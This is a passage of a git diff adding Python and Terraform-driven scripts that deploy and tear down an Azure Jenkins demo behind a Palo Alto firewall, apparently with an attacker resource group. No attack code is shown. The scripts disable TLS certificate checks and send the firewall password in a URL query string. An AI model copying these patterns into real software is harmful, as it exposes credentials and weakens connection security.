+    return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap')
+
+    if return_code == 0:
+        share_prefix = 'jenkins-demo'
+        resource_group = outputs['Resource_Group']['value']
+        bootstrap_bucket = outputs['Bootstrap_Bucket']['value']
+        storage_account_access_key = outputs['Storage_Account_Access_Key']['value']
+        update_status('web_in_bootstrap_status', 'success')
+    else:
+        logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstap_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+
+    share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+    WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+    WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+    WebInDeploy_vars.update({'RG_Name': resource_group})
+    WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+    WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+    #
+    # Build Infrastructure
+    #
+    #
+
+
+    return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+    update_status('web_in_deploy_output', web_in_deploy_output)
+    if return_code == 0:
+        update_status('web_in_deploy_status', 'success')
+        albDns = web_in_deploy_output['ALB-DNS']['value']
+        fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value']
+        nlbDns = web_in_deploy_output['NLB-DNS']['value']
+        fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+
+        logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("AppGateway address is {}".format(albDns))
+        logger.info("Internal loadbalancer address is {}".format(nlbDns))
+        logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    else:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    #
+    # Check firewall is up and running
+    #
+    #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+    logger.info("Updating firewall with latest content pack")
+    update_fw(fwMgtIP, api_key)
+
+    #
+    # Configure Firewall
+    #
+    WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+    logger.info("Applying addtional config to firewall")
+
+    return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+
+    if return_code == 0:
+        update_status('web_in_fw_conf', 'success')
+        logger.info("WebInFWConf ok")
+
+    else:
+        logger.info("WebInFWConf sent return code {}".format(return_code))
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+    parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    resource_group = args.resource_group
+    azure_region = args.azure_region
+
+    main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/deployment_status.json b/azure/Jenkins_proj-working/deployment_status.json
new file mode 100644
index 00000000..96c9a020
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployment_status.json
@@ -0,0 +1 @@
+{"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", "value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deployold.py b/azure/Jenkins_proj-working/deployold.py
new file mode 100644
index 00000000..b2ddb37e
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployold.py
@@ -0,0 +1,628 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+
+import requests
+import urllib3
+from azure.common import AzureException
+from azure.storage.file import FileService
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+# from . import cache_utils
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+    
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    try:
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+
+def listRecursive (d, key):
+    for k, v in d.items ():
+        if isinstance (v, OrderedDict):
+            for found in listRecursive (v, key):
+                yield found
+        if k == key:
+            yield v
+
+def update_fw(fwMgtIP, api_key):
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid =0
+    jobid = ''
+    key ='job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    for found in listRecursive(dict, 'job'):
+                        jobid = found
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(30)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete " )
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+            else:
+                logger.info('Unable to determine job status')
+
+
+    # install latest anti-virus update without committing
+    getjobid =0
+    jobid = ''
+    key ='job'
+    while getjobid == 0:
+        try:
+
+            type = "op"
+            cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    for found in listRecursive(dict, 'job'):
+                        jobid = found
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+        completed = 0
+        while (completed == 0):
+            time.sleep(30)
+            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+                fwMgtIP, jobid, api_key)
+            r = send_request(call)
+            tree = ET.fromstring(r.text)
+
+            logger.debug('Got response for show job {}'.format(r.text))
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("AV install Status Complete ")
+                        completed = 1
+                    else:
+                        status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                        print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+
+            else:
+                logger.info('Unable to determine job status')
+
+
+def getApiKey(hostname, username, password):
+    '''
+    Generate the API key from username / password
+    '''
+
+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+    # generate a unique share name to avoid overlaps in shared infra
+
+    # FIXME - Need to remove hardcoded directoty link below
+
+    d_dir = './WebInDeploy/bootstrap'
+    share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+    print('using share_name of: {}'.format(share_name))
+
+    # archive_file_path = _create_archive_directory(files, share_prefix)
+
+    try:
+        # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+        s = requests.Session()
+        s.verify = False
+
+        file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+        # print(file_service)
+        if not file_service.exists(share_name):
+            file_service.create_share(share_name)
+
+        for d in ['config', 'content', 'software', 'license']:
+            print('creating directory of type: {}'.format(d))
+            if not file_service.exists(share_name, directory_name=d):
+                file_service.create_directory(share_name, d)
+
+            # FIXME - We only handle bootstrap files.  May need to handle other dirs
+
+            if d == 'config':
+                for filename in os.listdir(d_dir):
+                    print('creating file: {0}'.format(filename))
+                    file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+    except AttributeError as ae:
+        # this can be returned on bad auth information
+        print(ae)
+        return "Authentication or other error creating bootstrap file_share in Azure"
+
+    except AzureException as ahe:
+        print(ahe)
+        return str(ahe)
+    except ValueError as ve:
+        print(ve)
+        return str(ve)
+
+    print('all done')
+    return share_name
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 15
+    while True:
+        if count < max_count:
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def main(username, password, rg_name, azure_region):
+    username = username
+    password = password
+
+    WebInBootstrap_vars = {
+        'RG_Name': rg_name,
+        'Azure_Region': azure_region
+    }
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password,
+        'Azure_Region': azure_region
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+        start_time = time.asctime()
+        print(f'Starting Deployment at {start_time}\n')
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir='./WebInBootstrap')
+
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+    return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output,
+                                            skip_plan=True, **kwargs)
+
+    resource_group = tf.output('Resource_Group')
+    bootstrap_bucket = tf.output('Bootstrap_Bucket')
+    storage_account_access_key = tf.output('Storage_Account_Access_Key')
+    web_in_bootstrap_output = tf.output()
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+    update_status('web_in_deploy_stdout', stdout)
+    update_status('web_in_bootstrap_output', web_in_bootstrap_output)
+
+    if return_code1 != 0:
+        logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstap_status', 'error')
+        update_status('web_in_bootstrap_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_bootstrap_status', 'success')
+
+    share_prefix = 'jenkins-demo'
+
+    share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+    WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+    WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+    WebInDeploy_vars.update({'RG_Name': resource_group})
+    WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+    WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+    # Build Infrastructure
+
+    tf = Terraform(working_dir='./WebInDeploy')
+    # print("vars {}".format(WebInDeploy_vars))
+    tf.cmd('init')
+    if run_plan:
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False, var=WebInDeploy_vars)
+
+    return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
+                                            **kwargs)
+
+    web_in_deploy_output = tf.output()
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+    update_status('web_in_deploy_stdout', stdout)
+    update_status('web_in_deploy_output', web_in_deploy_output)
+    if return_code1 != 0:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        update_status('web_in_deploy_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_deploy_status', 'success')
+
+    albDns = tf.output('ALB-DNS')
+    fwMgt = tf.output('MGT-IP-FW-1')
+    nlbDns = tf.output('NLB-DNS')
+    fwMgtIP = tf.output('MGT-IP-FW-1')
+
+    logger.info("Got these values from output \n\n")
+    logger.info("AppGateway address is {}".format(albDns))
+    logger.info("Internal loadbalancer address is {}".format(nlbDns))
+    logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    #
+    # Check firewall is up and running
+    # #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+    logger.info("Updating firewall with latest content pack")
+
+    update_fw(fwMgtIP, api_key)
+
+    #
+    # Configure Firewall
+    #
+    WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+    tf = Terraform(working_dir='./WebInFWConf')
+    tf.cmd('init')
+    kwargs = {"auto-approve": True}
+
+    logger.info("Applying addtional config to firewall")
+
+    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+
+    if run_plan:
+        tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
+
+    # update initial vars with generated fwMgt ip
+
+    return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+                                            var=WebInFWConf_vars, **kwargs)
+
+    web_in_fw_conf_out = tf.output()
+
+    update_status('web_in_fw_conf_output', web_in_fw_conf_out)
+    # update_status('web_in_fw_conf_stdout', stdout)
+
+    logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
+
+    if return_code2 != 0:
+        logger.error("WebInFWConf failed")
+        update_status('web_in_fw_conf_status', 'error')
+        update_status('web_in_fw_conf_stderr', stderr)
+        print(json.dumps(status_output))
+        exit(1)
+    else:
+        update_status('web_in_fw_conf_status', 'success')
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    # FIXME - add outputs for all 3 dirs
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+    parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    resource_group = args.resource_group
+    azure_region = args.azure_region
+
+    main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/destroy-old.py b/azure/Jenkins_proj-working/destroy-old.py
new file mode 100644
index 00000000..305e8925
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy-old.py
@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+git
+python destroy.py
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+    username = username
+    password = password
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    WebInBootstrap_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    albDns = ''
+    nlbDns = ''
+    fwMgt = ''
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    deployment_status = {}
+    kwargs = {"auto-approve": True}
+
+    #
+    # Destroy Infrastructure
+    #
+    tf = Terraform(working_dir='./WebInDeploy')
+    rg_name = tf.output('RG_Name')
+
+    attack_rg_name = tf.output('Attacker_RG_Name')
+    logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+    WebInDeploy_vars.update({'RG_Name': rg_name})
+    WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+    if run_plan:
+        print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+    # return_code1 =0
+    print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("Failed to destroy build ")
+
+        exit()
+    else:
+
+        logger.info("Destroyed WebInDeploy ")
+
+    WebInBootstrap_vars.update({'RG_Name': rg_name})
+    WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
+
+    tf = Terraform(working_dir='./WebInBootstrap')
+
+    if run_plan:
+        print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
+    # return_code1 =0
+    print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("WebInBootstrap destroyed")
+        deployment_status = {'WebInDeploy': 'Fail'}
+
+        exit()
+    else:
+        deployment_status = {'WebInDeploy': 'Success'}
+        exit()
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+
+    main(username, password)
diff --git a/azure/Jenkins_proj-working/destroy.py b/azure/Jenkins_proj-working/destroy.py
new file mode 100644
index 00000000..3bc6b81b
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy.py
@@ -0,0 +1,125 @@
+
+from azure.cli.core import get_default_cli
+import sys
+import tempfile
+import argparse
+import logging
+import subprocess
+import os
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+# handler = logging.StreamHandler()
+# formatter = logging.Formatter('%(levelname)-8s %(message)s')
+# handler.setFormatter(formatter)
+# logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+#
+# Usage azure_login.py -g rgname
+#
+
+sys.sterr = sys.stdout
+
+print('Logging in to Azure using device code')
+
+def run_cmd(cmd):
+    subprocess.call('az login', shell=True)
+    res = subprocess.call(cmd, shell=True)
+    print ('Result is {}'.format(res))
+
+
+def delete_file(fpath):
+    if os.path.exists(fpath):
+        try:
+            os.remove(fpath)
+            print ('Removed state file {}'.format(fpath))
+        except Exception as e:
+            print ('Unable to delete the file {} got error {}'.format(fpath, e))
+    else:
+        print('No need to delete {} as it no longer exists'.format(fpath))
+
+def az_cli(args_str):
+    temp = tempfile.TemporaryFile()
+    args = args_str.split()
+    logger.debug('Sending cli command {}'.format(args))
+    code = get_default_cli().invoke(args, None, temp)
+    # temp.seek(0)
+    data = temp.read().strip()
+    temp.close()
+    return [code, data]
+
+def delete_rg(rg_name):
+    logger.info('Deleting resource group {}'.format(rg_name))
+    cmd = 'group delete --name ' + rg_name + ' --yes'
+    code, data = az_cli(cmd)
+    if code == 0:
+        print ('Successfully deleted Rg {} {}'.format(code,rg_name))
+
+def delete_state_files(working_dir, file_list):
+    """
+
+    :param working_dir: string
+    :param tfstate_files: list of files
+    :return: True or False
+
+    Removes a list of files from a directory
+
+    """
+    for file_name in file_list:
+        fpath = working_dir + file_name
+        if os.path.exists(fpath):
+            delete_file(fpath)
+        else:
+            print('Already deleted file {}'.format(fpath))
+
+def main (username, password):
+    #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+    #
+    # Destroy Infrastructure
+    #
+    tfstate_file = 'terraform.tfstate'
+    tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup']
+
+    fpath = './WebInDeploy/' + tfstate_file
+    if os.path.isfile(fpath):
+        tf = Terraform(working_dir='./WebInDeploy')
+        rg_name = tf.output('RG_Name')
+        rg_name1 = tf.output('Attacker_RG_Name')
+        delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes'
